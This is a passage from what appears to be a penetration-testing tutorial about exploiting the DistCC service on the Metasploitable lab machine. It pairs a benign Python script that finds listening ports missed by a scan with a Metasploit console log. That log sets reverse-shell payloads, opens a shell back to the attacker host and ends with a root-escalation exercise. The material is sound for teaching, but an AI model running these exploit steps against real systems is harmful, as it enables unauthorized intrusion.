When we performed only the default nmap port scan, we did not include all possible ports. Because we have now gained initial access to the system, we enter netstat -antp, and we notice other ports that nmap did not scan for when performing the attack. (Remember that in a penetration test we can’t always rely on the defaults to be successful.)
Our scan finds that port 3632 is open and associated with DistCC. An online search tells us that DistCC is a program that distributes builds of C/C++ code to several machines across a network, and it is vulnerable to an attack. (When performing penetration tests, you will often encounter unfamiliar applications and products, and you will need to research the application before you can attack it.)
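One way to check scan coverage against what a host actually exposes, as an added example (not code from the book or from the Metasploit project): the script below parses netstat -antp output and reports every listener the earlier default scan never touched, calling out distcc on 3632 by name. The netstat sample, the DEFAULT_SCAN_PORTS set and the RISKY_SERVICES table are constructed for this example and modelled on the session described here.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample of `netstat -antp` output, modelled on the Metasploitable
# session in the text; it was not captured from a real system.
NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3632            0.0.0.0:*               LISTEN      4512/distccd
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
tcp        0      0 172.16.32.162:47002     172.16.32.129:4444      ESTABLISHED 5120/sh
tcp6       0      0 :::80                   :::*                    LISTEN      -
"""

# Ports the earlier default scan reported open (constructed assumption).
DEFAULT_SCAN_PORTS: Set[int] = {21, 22, 80, 8180}

# Services worth naming when they show up outside the scanned set (assumption).
RISKY_SERVICES = {3632: "distcc (the service exploited in this section)"}

# Columns of `netstat -antp`: Proto Recv-Q Send-Q Local Foreign State PID/Program
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+"
    r"(?P<state>\S+)\s+(?P<prog>\S+)"
)


def listening_ports(netstat_text: str) -> Dict[int, str]:
    """Return {port: program} for every TCP socket in LISTEN state."""
    found: Dict[int, str] = {}
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("state") != "LISTEN":
            continue
        # Local address is "addr:port"; rsplit copes with IPv6 forms like ":::80".
        port = int(m.group("local").rsplit(":", 1)[1])
        found[port] = m.group("prog")
    return found


def scan_gaps(listening: Dict[int, str], scanned: Set[int]) -> List[Tuple[int, str, str]]:
    """Listeners the scan never covered, each with a note for known high-risk services."""
    gaps = []
    for port in sorted(set(listening) - scanned):
        gaps.append((port, listening[port], RISKY_SERVICES.get(port, "unscanned listener")))
    return gaps


if __name__ == "__main__":
    for port, prog, note in scan_gaps(listening_ports(NETSTAT_SAMPLE), DEFAULT_SCAN_PORTS):
        print(f"{port:>5}/tcp  {prog:<14} {note}")
```

Feeding it real netstat output from an audited host, together with the port list from the scan you actually ran, shows immediately which exposed services your scan profile would have missed.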
msf exploit(distcc_exec) > set payload linux/x86/shell_reverse_tcp
payload => linux/x86/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(distcc_exec) > set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

   Name                   Rank    Description
   ----                   ----    -----------
   cmd/unix/bind_perl     normal  Unix Command Shell, Bind TCP (via perl)
   cmd/unix/bind_ruby     normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/generic       normal  Unix Command, Generic command execution
   cmd/unix/reverse       normal  Unix Command Shell, Double reverse TCP (telnet)
   cmd/unix/reverse_perl  normal  Unix Command Shell, Reverse TCP (via perl)
   cmd/unix/reverse_ruby  normal  Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(distcc_exec) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo q6Td9oaTrOkXsBXS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "q6Td9oaTrOkXsBXS\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.32.129:4444 -> 172.16.32.162:47002) at 2010-05-22 00:08:04 -0400

whoami
daemon
mkdir /root/moo
mkdir: cannot create directory '/root/moo': Permission denied
Notice above that we still do not have root: the shell runs as the daemon user, and writing under /root is denied. A local privilege-escalation exploit will compromise the system further and give full root access. We won’t tell you the answer here; use what you’ve learned in this book to gain root privileges on the Metasploitable system. One hint is that you can find the exploit at Exploits Database (http://www.exploit-db.com/). Try getting a root Linux/Meterpreter shell on the system on your own.